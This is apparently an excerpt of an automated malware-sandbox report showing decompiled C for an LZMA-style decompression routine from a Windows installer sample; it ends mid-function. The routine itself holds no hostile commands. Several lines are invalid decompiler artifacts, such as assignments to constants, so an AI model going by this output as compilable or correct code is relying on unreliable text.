                                                                            • Instruction ID: 8282c7973928a3a8991f4aebeb421c6794774a39cdfa424cdd26f1de73b17733
                                                                            • Opcode Fuzzy Hash: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                                                                            • Instruction Fuzzy Hash: 74816571D14228DBDF28CFA8C844BADBBB1FB44305F14816AD856BB2C1C7786A86DF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406BC4, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 98%
                                                                            			E00406BC4() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
